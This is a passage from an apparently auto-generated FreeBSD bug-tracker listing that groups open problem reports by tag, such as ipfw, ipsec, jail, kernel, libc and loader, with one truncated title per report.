[ipfw] [patch] ipfw ioctl interface implementation o kern/86957 ipfw [ipfw] [patch] ipfw mac logging o kern/82724 ipfw [ipfw] [patch] [request] Add setnexthop and defaultrou s kern/80642 ipfw [ipfw] [patch] ipfw small patch - new RULE OPTION o kern/74104 ipfw [ipfw] ipfw2/1 conflict not detected or reported, manp o kern/73910 ipfw [ipfw] serious bug on forwarding of packets after NAT o kern/72987 ipfw [ipfw] ipfw/dummynet pipe/queue 'queue [BYTES]KBytes ( o kern/71366 ipfw [ipfw] "ipfw fwd" sometimes rewrites destination mac a o kern/69963 ipfw [ipfw] install_state warning about already existing en o kern/62042 luigi [ipfw] ipfw can't no more reject icmp (icmptypes 8) o kern/60719 ipfw [ipfw] Headerless fragments generate cryptic error mes o kern/56031 luigi [ipfw] ipfw hangs on every invocation o kern/55984 ipfw [ipfw] [patch] time based firewalling support for ipfw s kern/51341 remko [ipfw] [patch] ipfw rule 'deny icmp from any to any ic o kern/51274 ipfw [ipfw] [patch] ipfw2 create dynamic rules with parent o kern/48172 ipfw [ipfw] [patch] ipfw does not log size and flags o kern/46159 ipfw [ipfw] [patch] [request] ipfw dynamic rules lifetime f a kern/26534 ipfw [ipfw] Add an option to ipfw to log gid/uid of who cau 56 problems total. Problem reports for tag 'ipl': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132554 net [ipl] There is no ippool start script/ipfilter magic t o kern/121534 darrenr [ipl] [nat] FreeBSD Release 6.3 Kernel Trap 12: 2 problems total. Problem reports for tag 'ipmi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/130512 [ipmi] [patch] Various mistakes in IPMI watchdog handl o kern/125389 [ipmi] [bce] IPMI problem with bce o kern/123904 [ipmi] ipmi(4) reports negative temperature values on f kern/122252 net [ipmi] [bge] IPMI problem with BCM5704 (does not work o i386/105175 i386 [ipmi] ipmi acpi trouble on supermicro server a kern/103041 linimon [ipmi] unloading ipmi panics Dell PE 2850, ipmi doesn' o kern/79143 [ipmi] Broadcom NIC driver do not work for IPMI 7 problems total. Problem reports for tag 'ipnat': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127233 darrenr [ipnat]: ipnat + ipfilter source routing not handling o kern/115239 net [ipnat] panic with 'kmem_map too small' using ipnat o kern/91908 darrenr [ipnat] loading ipl.ko to the kernel compiled with opt 3 problems total. Problem reports for tag 'ips': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/121903 i386 [ips] [boot] can't boot on IBM x235 ServeRaid 6M [regr o kern/93750 [ips] Boot hangs on ips0: resetting adapter, this may o kern/92164 scottl [ips] [lor] SCSI target mode LOR o kern/57832 scottl [ips] softdep_deallocate_dependencies: dangling deps 4 problems total. Problem reports for tag 'ipsec': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133060 net [ipsec] [pfsync] [panic] Kernel panic with ipsec + pfs o kern/132277 net [crypto] [ipsec] poor performance using cryptodevice f o kern/129517 net [ipsec] [panic] double fault / stack overflow s conf/128030 bz [ipsec] [request] Isn't it time to enable IPsec in GEN p bin/126468 bz [ipsec] some ipsec configurations make FreeBSD panic o kern/123793 bz [ipsec] [patch] KAME IPSEC does not pass processed pac o kern/123587 bz [ipsec] IPCOMP broken in IPSEC (FAST_IPSEC for RELENG_ o kern/123463 net [ipsec] [panic] repeatable crash related to ipsec-tool f kern/123066 vanhu [ipsec] [panic] kernel trap with ipsec a kern/122565 bz [ipsec] [ip6] Possible memory overwrite for IPv6 IPsec o kern/122563 bz [ipsec] KEY_FREESAV() in FreeBSD-Release7.0 o kern/122562 bz [ipsec] IPsec AH tunneled packet mis handling? f kern/122065 bz [ipsec] [gre] gre over ipsec not working o kern/121642 bz [ipsec] [gif]: When using IPSec, tcpdump shows non-dec o kern/121373 bz [ipsec] New IPSEC & IPV6 & AH+ESP Broken o kern/112722 net [ipsec] [udp] IP v4 udp fragmented packet reject f kern/110959 bz [ipsec] Filtering incoming packets with enc0 does not o kern/103135 net [ipsec] ipsec with ipfw divert (not NAT) encodes a pac a kern/95307 vanhu [ipsec] Panic (race condition?) in ipsec_process_done o kern/94273 gnn [ipsec] [patch] IPIP decapsulation problem in FAST_IPS o kern/88336 vanhu [ipsec] [patch] setkey(8) -D fails to report all SAs f kern/39233 bz [ipsec]: NonConforming IPsec implementation from FreeB 22 problems total. Problem reports for tag 'ipw': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/131087 net [ipw] [panic] ipw / iwi - no sent/received packets; iw o kern/126339 net [ipw] ipw driver drops the connection o kern/118534 [ipw] bitrate and power wifi can't change/set ipw Inte o kern/110140 net [ipw] ipw fails under load o kern/84861 thompsa [ipw] [patch] still can't get working ipw(4) with adho a kern/82926 thompsa [ipw] ipw(4) doesn't seem to do WPA, also leaves entri 6 problems total. Problem reports for tag 'ipx': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/83368 [ipx] [patch] incorrect handling of malloc failures wi 1 problem total. Problem reports for tag 'irq': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/122148 i386 [irq] interrupt storm on 7.0 [regression] o kern/119696 [irq] [ral] ral device causes massive interrupt storm o usb/119513 usb [irq] inserting dlink dwl-g630 wireless card results i o usb/117613 usb [uhci] [irq] uhci interrupt storm & USB leaked memory o kern/113138 [irq] interrupt storm on 6.x kernels on an MS-1029 (AM o kern/103532 [irq] Interrupt storm in 6.2-PRERELEASE [regression] o kern/74786 [irq] [patch] Smartlink Modem causes interrupt storm o 7 problems total. Problem reports for tag 'isa': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/37441 davidxu [isa] [patch] ISA PNP parse problem 1 problem total. Problem reports for tag 'iscsi': S Tracker Resp. Description -------------------------------------------------------------------------------- o sparc/121676 scsi [iscsi] iscontrol do not connect iscsi-target on sparc 1 problem total. Problem reports for tag 'iso9660': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/95222 fs [iso9660] File sections on ISO9660 level 3 CDs ignored 1 problem total. Problem reports for tag 'isp': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/132394 scsi [isp] - bad underruns with QLogic qla2300 and amd64 o kern/127927 scsi [isp] isp(4) target driver crashes kernel when set up o kern/126866 scsi [isp] [panic] kernel panic on card initialization 3 problems total. Problem reports for tag 'iwi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/131153 net [iwi] iwi doesn't see a wireless network o kern/127826 net [iwi] iwi0 driver has reduced performance and connecti o kern/124767 net [iwi] Wireless connection using iwi0 driver (Intel 220 o kern/123559 net [iwi] iwi periodically disassociates/associates [regre a kern/122597 thompsa [iwi] Intel iwi fails after 3 - 4 hours of use"firmwar o kern/116185 net [iwi] if_iwi driver leads system to reboot o conf/113117 linimon [iwi] if_iwi isn't present in today's CURRENT/AMD64 7 problems total. Problem reports for tag 'iwn': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132625 net [iwn] iwn drivers don't support setting country 1 problem total. Problem reports for tag 'ixgbe': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128577 [ixgbe] [patch] Send queue stall in ixgbe driver when o kern/127834 net [ixgbe] [patch] wrong error counting o kern/126688 net [ixgbe] [patch] 1.4.7 ixgbe driver panic with 4GB and 3 problems total. Problem reports for tag 'jail': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133265 jail [jail] is there a solution how to run nfs client in ja f kern/132092 bz [jail] jail can listen on *:port when jail_socket_unix p kern/126368 bz [jail] Running ktrace/kdump in jail leads to stale jai o conf/124248 rc [jail] [patch] add support for nice value for rc.d/jai o kern/119842 jail [smbfs] [jail] "Bad address" with smbfs inside a jail p kern/114325 bz [jail] SIOCGIFADDR ioctl behaves incorrectly inside ja p conf/103489 bz [rc.d] [named] [jail] [patch] named_chroot_autoupdate p kern/103464 bz [dns] [jail] jail networking failures to 127.0.0.1 onl o bin/99566 jail [jail] [patch] fstat(1) according to specified jid f kern/89989 bz [jail] [patch] Add option -I (ASCII 73) PID to specif o bin/78763 pjd [patch] [jail] Added jail support to ps(1) f kern/74314 bz [resolver] [jail] DNS resolver broken under certain ja p kern/68189 bz [arp] [jail] [patch] arp -a discloses non-jail interfa o kern/48471 pjd [jail] [patch] [request] private IPC for every jail o bin/32828 jail [jail] w(1) incorrectly handles stale utmp slots with s kern/13997 rwatson [jail] [patch] RLIMIT_NPROC works unadequately for jai 16 problems total. Problem reports for tag 'joy': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/64588 [joy] [request] Extend joystick driver architecture to 1 problem total. Problem reports for tag 'kbdmux': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/127446 emax [kbdmux] [patch] fix race in sys/dev/kbdmux/kbdmux.c 1 problem total. Problem reports for tag 'kerberos': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/45830 [kerberos] KDC has problems when listening to IPv6 and 1 problem total. Problem reports for tag 'kernel': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133985 [kernel] kern.cp_time returns all zeros and stops incr o kern/132104 [kernel] [patch] kenv(1) buffer overflow o kern/131597 [kernel] c++ exceptions very slow on FreeBSD 7.1/amd64 o kern/130261 [kernel] [panic] kernel panic in/below sys_pipe.c:knli o kern/129164 [kernel] Wrong priority value for normal processes o kern/124564 [kernel] [patch] add CPUID bits to ident phenom proces o amd64/124134 amd64 [kernel] The kernel doesn't follow the calling convent o kern/121073 [kernel] [patch] run chroot as an unprivileged user o kern/119358 [kernel] [patch] SYSINIT_VERBOSE can be more verbose o kern/119202 [kernel] [patch] Add generic support for disabling dev o kern/114492 [kernel] [patch] device_attach() doesn't unset devclas p kern/112554 silby [kernel] [patch] unp_gc is overly agressive and remove o power/111296 ppc [kernel] [patch] [request] Support IMISS, DLMISS an DS o kern/110249 kmacy [kernel] [regression] [patch] setsockopt() error regre p stand/108390 kib [kernel] [patch] wait4() erroneously waits for all chi o kern/98460 [kernel] [patch] fpu_clean_state() cannot be disabled o kern/97000 [kernel] [patch] bogus "All threads purged from ugen0. o kern/96429 [kernel] [patch] kern_linker.c hardcodes "/boot/kernel o kern/93887 [kernel] cpu_spinwait calls missing in subr_smp.c o kern/93331 [kernel] [patch] broken asm in kernel o kern/92023 [kernel] 'options DEVICE_POLLING' makes loadavg wrong o kern/91414 emaste [kernel] [patch] Polling for devices other than NICs o kern/87990 [kernel] [patch] SMP Race Condition in kdb_enter/kdb_e o kern/86290 jeff [kernel] [patch] minor optimizations + cleanup to vrel o kern/85657 [kernel] [patch] capture and expose per-CPU time accou o kern/85651 [kernel] [patch] debugging code to show entries in eve o usb/83504 usb [kernel] [patch] SpeedTouch USB stop working on recent o kern/81588 phk [kernel] [patch] Devices with SI_CHEAPCLONE flag don't s kern/79339 [kernel] [patch] Kernel time code sync with improvemen s kern/68317 [kernel] [patch] on soft (clean) reboots clean dmesg o o kern/64196 [kernel] [patch] remove the arbitrary MAXSHELLCMDLEN s kern/61497 ups [kernel] [patch] __elfN(map_insert) bug o kern/60550 silby [kernel] [patch] hitting process limits produces sub-o o kern/58803 [kernel] [patch] kern.argmax isn't changeable even at o kern/54604 pjd [kernel] [patch] make 'ps -e' procfs-independent o kern/53447 alfred [kernel] poll(2) semantics differ from susV3/POSIX s kern/50827 [kernel] [patch] [request] add sane record locking o kern/50526 [kernel] [patch] update to #! line termination o kern/43577 [kernel] [patch] [request] new kernel option SHUTDOWN_ o kern/42274 [kernel] [patch] Convert defined variable into tuneabl o kern/40369 [kernel] [patch] rman_reserve_resource - when "count > o kern/37555 [kernel] [patch] vnode flags appear to be changed in n o kern/29355 mux [kernel] [patch] add lchflags support 43 problems total. Problem reports for tag 'keyboard': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/135542 usb [keyboard] boot loader does not work with a usb keyboa o kern/135164 [keyboard] UK currency key inactive o kern/128172 gavin [keyboard] Remote Console (Keyboard) of AOC-SIM1U+ not o kern/125675 [keyboard] [patch] Add hw.syscons.kbd_suspend new sysc o usb/125088 usb [keyboard] Touchpad not detected on Adesso AKB-430UG U o usb/121708 usb [keyboard] nforce 650i mobo w/ usb keyboard infinite k o kern/118021 randi [keyboard] 7.0 Beta 2 sysinstall keyboard emits contro o kern/115253 [keyboard] Wireless keyboard not working at boot o kern/103498 [keyboard] momentary system "pauses" when switching VT o kern/102784 [keyboard] system crashes when using hardware function o usb/102678 usb [keyboard] Dell PowerEdge DRAC5 USB Keyboard does not o conf/100782 [keyboard] [patch] Default keymap to support ALT+Left, o usb/100746 usb [keyboard] system does not boot due to USB keyboard pr o usb/99538 usb [keyboard] while using USB keyboard default params of o usb/99431 usb [keyboard] FreeBSD on MSI 6566E (Intel 845E motherboar s usb/95348 usb [keyboard] USB keyboard unplug causes noise on screen o i386/93793 i386 [keyboard] Keyboard stops working after a shutdown -p o kern/80694 [keyboard] [patch] atkbd looped on Acer TravelMate 270 o kern/77091 [keyboard] Keyboard quits working under X with MAXCONS o usb/59698 usb [keyboard] [patch] Rework of ukbd HID to AT code trans o kern/41215 [keyboard] console revert back to kbd0 (AT) after KVM o kern/33965 [keyboard] [patch] programmable keys of the keyboard ( 22 problems total. Problem reports for tag 'kqueue': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/129550 i386 [pae] [kqueue] crash with PAE kernel o kern/125356 [kqueue] [panic] Repeated panic in kqueue_close from k o kern/116770 [kqueue] Unfortunate fifo/O_NONBLOCK/kevent interactio o kern/110199 jmg [kqueue] [patch] kqueue_register doesn't update the kn o kern/89775 [kqueue] [hang] kevent hangs on second wait for /dev/d o kern/64178 jmg [kqueue] [patch] kqueue does not work with bpf when us o kern/43905 jmg [kqueue] [patch] kqueues: EV_SET(kevp++, ...) is non-i 7 problems total. Problem reports for tag 'ktr': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/108100 [ktr] sysctl debug.ktr.alq_enable=1 results in reboot 1 problem total. Problem reports for tag 'lagg': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132715 net [lagg] [panic] Panic when creating vlan's on lagg inte f kern/125442 gonzo [carp] [lagg] CARP combined with LAGG causes system pa o kern/123279 thompsa [lagg] order of operations dependancy in bringing up l o kern/122954 net [lagg] IPv6 EUI64 incorrectly chosen for lagg devices p kern/122794 net [lagg] Kernel panic after brings lagg(8) up if NICs ar o kern/122780 net [lagg] tcpdump on lagg interface during high pps wedge 6 problems total. Problem reports for tag 'libalias': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/115526 piso [libalias] libalias doesn't free memory o kern/105579 piso [libalias] dcc resume over natd in 6.x o kern/74450 [libalias] [patch] enable libalias/natd to create skip o kern/54891 [libalias] [patch] libalias(3)/natd(8) and exporting c o kern/50310 [libalias] [patch] natd / libalias fix to allow dcc re o kern/41307 [libalias] [patch] logging of links lifecycle (add/del 6 problems total. Problem reports for tag 'libarchive': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/121556 kientzle [libarchive] ISO9660 decompression extension unsupport 1 problem total. Problem reports for tag 'libc': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/135017 [libc] bind exiting (due to assertion failure). resolv o kern/134513 [libc] [patch] fts(3) FTS_NOCHDIR misbehavior with emp o kern/134391 [libc] dladdr(3) does effectively not work on main pro o kern/133776 [libc] [patch] snprintf(3) and vsnprintf(3) do not pro o kern/133246 [libc] dlclose(3) gives segfault when called in the fi o kern/131623 [libc] gethostbyname(2): output of gethostbyname_r doe f kern/131602 gavin [libc] sendfile(2) sends corrupted data o kern/130749 [libc] [patch] nscache.c/nscachedcli.c - return error o kern/130504 [libc] Serious bug in regular expression library (rege o kern/129172 [libc] signals are not delivered always o kern/128933 [libc] realpath(3) does not follow SUS specification f o bin/127872 [libc] [patch] Rewinding on unionfs and Subversion o kern/126289 [libc] select(2) apparently consumes cpu when it shoul o kern/125382 [libc] open(2): ENOSPC may be misleading, consider EIO p kern/124334 mtm [libc] [patch] lib/libc/glob.c fails to compile under o kern/124160 net [libc] connect(2) function loops indefinitely o kern/123095 [libc] sendfile(2): Suspected sendfile data corruption f kern/122061 [libc] dlsym(3) is very slow when a symbol cannot be f o kern/121656 [libc] [patch] telldir(3) issues o kern/120128 attilio [libc] [patch] __getcwd erroneously returning ENOENT o threa/118544 delphij [libc] [patch] the "clnt_create" function in "libc/rpc o bin/116074 [libc] fnmatch() does not handle FNM_PERIOD correctly o kern/115631 [libc] [patch] [request] make dlclose(3) atexit-aware o kern/115196 bushman [libc] [patch] [request] Implement getgroupmembership( s kern/114578 [libc] wide character printing using swprintf(dst, n, o bin/113825 [patch] [libc] [ggated] Fix -STABLE build with -fno-st o bin/113398 [libc] [patch] initgroups fails rather than truncates o amd64/112222 amd64 [libc] 32-bit libc incorrectly converts some FP number o bin/109478 [libc] [patch] adopt reentrant syslog functions from O o bin/108118 [libc] files should not cache their EOF status p stand/107561 standards [libc] [patch] [request] Missing SUS function tcgetsid o kern/103312 [libc] dlsym(NULL,) doesn't work properly o bin/102515 [libc] fsck_ufs crashes if no console at all o kern/100709 net [libc] getaddrinfo(3) should return TTL info o kern/99800 [libc] [patch] Add support for profiling multiple exec a bin/96840 [libc] [patch] getgrent() does not return large groups o kern/95239 [libc] [patch] nftw(3) returns EINVAL for large values o bin/95002 [libc] hash db source code has a bug which prevents us a kern/94827 [libc] mmap with given (void *addr) may lock memory-ma o stand/94729 standards [libc] fcntl() throws undocumented ENOTTY o kern/94519 [libc] [patch] Add UF_HIDDEN file flag; map it to Wind o kern/93197 [libc] strptime(3) succeeds on formats it should fail o kern/93093 [libc] xdr_string might call strlen(3) on NULL o kern/92880 net [libc] [patch] almost rewritten inet_network(3) functi o kern/90580 [libc] wordexp(3) fails to check for EINTR o kern/87729 phk [libc] [patch] most calls to malloc(3) generate warnin o threa/83914 threads [libc] popen() doesn't work in static threaded program o kern/82980 [libc] realpath(3) treats regular files as directories p kern/81987 matteo [libc] [patch] memory leaks in libc/rpc s kern/79048 [libc] realloc() copies data even when the size of all o kern/76485 [libc] sched_getparam(2) returns weird priority number o kern/76398 [libc] stdio can lose data in the presence of signals o kern/75855 adrian [libc] getpwent(3) functions on 5.3 with large passwor s bin/75767 [libc] [request] "fdclose" function in libc o kern/69826 [libc] 16th group has no effect when accesing file on o kern/69825 [libc] 1st group supplied to setgroups() does not take o kern/68690 [libc] write(2) returns wrong value when EFAULT s kern/64875 standards [libc] [patch] [request] add a system call: fdatasync( s kern/59739 [libc] rmdir(2) and mkdir(2) both return EISDIR for ar p kern/58687 deischen [libc] [patch] gethostbyname(3) leaks kqueue file desc s kern/56720 [libc] [request] UNICODE support in Resolver o kern/46866 [libc] NIS-based getpwent(3) falsely returns NULL o kern/45293 [libc] kevent denies to observe /dev/tty o kern/42956 [libc] dlclose gives "invalid shared object handle" wh o kern/42429 [libc] [patch] hash_action called with HASH_DELETE doe o kern/42422 [libc] [patch] dbm_delete returns -1 instead of 1 when o kern/36902 [libc] [patch] proposed new format code %N for strftim o kern/31981 [libc] [patch] (mis)feature in getnetent parsing -- co o kern/31906 [libc] No method available to unwind atexit(3) stack w o kern/31647 net [libc] socket calls can return undocumented EINVAL o kern/30186 net [libc] getaddrinfo(3) does not handle incorrect servna o kern/27835 standards [libc] execve() doesn't conform to execve(2) spec in s o bin/26486 remko [libc] [patch] setnetgrent hangs when netgroup contain o kern/25886 [libc] cgetset(3) doesn't get cleared when switching d 74 problems total. Problem reports for tag 'libc_r': S Tracker Resp. Description -------------------------------------------------------------------------------- s threa/32295 threads [libc_r] [patch] pthread(3) dont dequeue signals 1 problem total. Problem reports for tag 'libcrypt': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/120075 [libcrypt] Incompatible EOS of key in crypt(3) o kern/75934 [libcrypt] [patch] missing blowfish functionality in p 2 problems total. Problem reports for tag 'libcrypto': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/117709 simon [libcrypto] [patch] Base openssl does not define OPENS 1 problem total. Problem reports for tag 'libdialog': S Tracker Resp. Description -------------------------------------------------------------------------------- o gnu/48638 [libdialog] [patch] some bug fixes in libdialog 1 problem total. Problem reports for tag 'libdisk': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/113849 [libdisk] [patch] Correction of Sanitize_Bios_Geom for o kern/97164 [libdisk] libdisk's Open_Disk() crashes o kern/42217 [libdisk] libdisk segfaults with 1024 bytes/sector dis o kern/36916 randi [libdisk] [patch] DOS active partition flag lost in li o kern/31201 [libdisk] [patch] add free_space(chunk) to libdisk o kern/24435 [libdisk] [patch] changing slice type causes Auto-part 6 problems total. Problem reports for tag 'libedit': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/117348 [libedit] Loading history file sometimes fails in libe 1 problem total. Problem reports for tag 'libelf': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134502 [libelf] why 32 bit app not use /libexec/ld-elf32.so.1 1 problem total. Problem reports for tag 'libexec': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134225 [libexec] [patch] Reduce disk write load from save-ent o kern/110017 [libexec] [patch] serial port console output garbled o bin/95339 [libexec] [patch] rtld is thread-unsafe. fixes for dlo o kern/92412 [libexec] [patch] rpc.rstatd reports bogus packets/per o kern/45729 [libexec] [patch] make rbootd transfer the default fil 5 problems total. Problem reports for tag 'libfetch': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133491 [libfetch] [patch] Digest HTTP authentication support o bin/127280 des [libfetch] [patch] fetch/libfetch RFC 1738 %2F escaped o bin/125350 des [libfetch] [patch] src/lib/libfetch add support for de o kern/116005 des [libfetch] libfetch accepts invalid URLs o kern/98873 des [libfetch] allow fetch(3) to force using of ipv4 or ip 5 problems total. Problem reports for tag 'libgcc': S Tracker Resp. Description -------------------------------------------------------------------------------- o gnu/128262 [libgcc] [patch] contrib/gcclibs/libcpp/errors.c: -Wmi 1 problem total. Problem reports for tag 'libgssapi': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/113266 harti [libgssapi] [patch] Missing handling of mech_type in g 1 problem total. Problem reports for tag 'libi386': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134590 [libi386] [gpt] [patch] Bootloader support for hybrid 1 problem total. Problem reports for tag 'libiconv': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134249 [libiconv] [patch] ignore case for character set names s kern/76520 [libiconv] [patch] Add new kernel-side libiconv conver 2 problems total. Problem reports for tag 'libkrb': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/29062 markm [libkrb] krb4 and krb5 multiply defined version symbol 1 problem total. Problem reports for tag 'libkvm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/120872 [libkvm] [patch] fstat exit on signal 11 o kern/95405 [libkvm] libkvm does not support /dev/fwmem0.0 in Free o kern/42386 [libkvm] [patch] cleaning code from warnings in libkvm 3 problems total. Problem reports for tag 'libm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133583 [libm] fma(3) does not respect rounding mode using ext o stand/83845 standards [libm] [patch] add log2() and log2f() support for libm 2 problems total. Problem reports for tag 'libmap': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/78646 [libmap] [patch] libmap should canonicalize pathnames 1 problem total. Problem reports for tag 'libmd': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/112775 [libmd] [patch] libmd(3) bug for some zero-length file 1 problem total. Problem reports for tag 'libpam': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/117512 des [libpam] [patch] document .opieaccess for pam_opieacce o bin/115946 des [libpam] [patch] not thread-safe o kern/115164 des [libpam] [patch] [request] Add support for the account o kern/115162 des [libpam] [patch] [request] Add check for target user's o kern/109416 des [libpam] [patch] pam_group doesn't check login_group m o bin/105341 [libpam] [patch] [request] pam_krb5: Add minimum_uid/m o bin/93310 des [libpam] [patch] pam_unix ignores 'passwordtime' from o kern/91954 [libpam] [patch] Proposed enhancement for pam_krb5: "o o kern/76678 dfr [libpam] [patch] Allow pam_krb5 to authenticate no loc s kern/20333 des [libpam] ftp login fails on unix password when s/key a 10 problems total. Problem reports for tag 'libradius': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/103764 [libradius] [patch] libradius aborts server processing 1 problem total. Problem reports for tag 'librpcsvc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/42387 [librpcsvc] [patch] cleaning code of librpcsvc from wa 1 problem total. Problem reports for tag 'libstand': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/93998 [libstand] [patch] panic in libstand when closing raw o kern/85650 [libstand] [patch] modifications to tftp-based PXE boo o kern/83424 [libstand] [patch] improper handling of malloc failure 3 problems total. Problem reports for tag 'libtacplus': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/80269 [libtacplus] [patch] libtacplus tac_get_av_value will 1 problem total. Problem reports for tag 'libusb': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/114310 usb [libusb] [patch] [panic] USB hub attachment panics ker 1 problem total. Problem reports for tag 'libusbhid': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/101775 usb [libusbhid] [patch] possible error in report descripto o kern/83451 [libusbhid] [patch] improper handling of malloc failur 2 problems total. Problem reports for tag 'libutil': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/84797 [libutil] [patch] State engine in the libutils propert s kern/38347 [libutil] [patch] [request] new library function abs2r o kern/35774 [libutil] logwtmp: Suboptimal auditing possibilities f 3 problems total. Problem reports for tag 'libvgl': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/83426 [libvgl] [patch] improper handling of malloc failures 1 problem total. Problem reports for tag 'libwrap': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132705 net [libwrap] [patch] libwrap - infinite loop if hosts.all 1 problem total. Problem reports for tag 'libz': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/96393 [libz] [patch] assembler implementations for libz on i 1 problem total. Problem reports for tag 'linprocfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/130724 emulation [linprocfs] [patch] cpuinfo in linprocfs is dated, cau o kern/99094 [linprocfs] panic: sleeping thread (Sleeping thread .. o kern/94528 [linprocfs] linprocfs /proc/memory reports wrong size o kern/56451 emulation [linprocfs] /compat/linux/proc/cpuinfo gives wrong CPU o kern/31048 des [linprocfs] /proc/meminfo cannot handle multiple swap 5 problems total. Problem reports for tag 'linux': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/134251 dchagin [linux] skype-2.0.0.72 broke with recent kernel change o kern/133144 [linux] linuxulator 2.6 crashes with nvidias libGL.so. o kern/129169 emulation [linux] [patch] Linux Emulation ENOTCONN error using n o kern/126232 emulation [linux] Linux ioctl TCGETS (0x5401) always fails o bin/120055 dchagin [linux] kdump(1) segfaults on freebsd6_mmap syscall p kern/102956 dchagin [linux] [patch] Add partial support for SO_PEERCRED in f kern/99068 [linux] [patch] Linux emulator crashed by java, when c o kern/97326 emulation [linux] file descriptor leakage in linux emulation o kern/86619 [linux] linux emulator interacts oddly with cp o kern/73777 emulation [linux] [patch] linux emulation: root dir special hand a kern/72920 emulation [linux]: path "prefixing" is not done on unix domain s o kern/39201 emulation [linux] [patch] ptrace(2) and rfork(RFLINUXTHPN) confu o kern/29698 emulation [linux] [patch] linux ipcs doesn'work o kern/21463 emulation [linux] Linux compatability mode should not allow setu 14 problems total. Problem reports for tag 'lo': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/123568 gnn [lo] loopback interface error (don`t ask) o kern/112612 andre [lo] Traffic via additional lo(4) interface shows up o 2 problems total. Problem reports for tag 'loader': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/127981 i386 [loader] Stack underflow preventing boot [regression] o kern/120127 [loader] Loading of gzip'd mfsroot from pxeboot(8) cau o i386/112635 i386 [hang] [loader] Hang during boot installation o kern/110995 kmacy [loader] [patch] loader wastes space worth symtab size o kern/96927 [loader] Loader(8) cause kernel death on "boot -a" [re f i386/93762 gavin [hang] [loader] Machine lockup at boot loader countdow o i386/85652 i386 [loader] [patch] deal with out-of-memory errors during o kern/73004 [loader] [patch] PXE loader malfunction in multiple PX o i386/62003 remko [loader] [patch] make /boot/loader "reboot" code same 9 problems total. Problem reports for tag 'locale': S Tracker Resp. Description -------------------------------------------------------------------------------- f conf/109367 i18n [locale] UTF8 encoded locales and problem collating ac f conf/105100 ache [patch] [locale] no support for lv (latvian) locale f conf/91106 i18n [locale] date definitions in pl_PL locale are wrong 3 problems total. Problem reports for tag 'lpt': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/117973 [panic] [lpt] 7.0-BETA2: repeatable panic while printi o kern/108361 [lpt] lpt0: device busy with HP 710c parallel printer o kern/73744 [lpt] printing via cups causes "Interrupt storm" warni o kern/27403 [lpt] lpt driver doesn't handle flags anymore o kern/26562 [lpt] [patch] /dev/lpt0 returns EBUSY when attempting 5 problems total. Problem reports for tag 'make.conf': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/114082 [make.conf] default CFLAGS have a blank at the end 1 problem total. Problem reports for tag 'makefile': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/115581 amd64 [Makefile] [patch] -mfancy-math-387 has no effect 1 problem total. Problem reports for tag 'mbuf': S Tracker Resp. Description -------------------------------------------------------------------------------- a kern/134355 [mbuf] comments for m_getm2 inconsistent with behaviou o kern/122743 net [mbuf] [panic] vm_page_unwire: invalid wire count: 0 2 problems total. Problem reports for tag 'mca': S Tracker Resp. Description -------------------------------------------------------------------------------- o ia64/113102 ia64 [MCA] Multiple records can have the same sequence numb 1 problem total. Problem reports for tag 'md': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133170 [md] [panic] panic when detaching swap-backed md(4) di o conf/122968 [md] md swapfile multiplication after init 1 o kern/122288 [md] [patch] mdconfig(8) returning negative unit numbe o conf/118113 [md] mdconfig init script requires image to be on root o kern/81161 [md] Images mounted through mdconfig on a read-only fs p 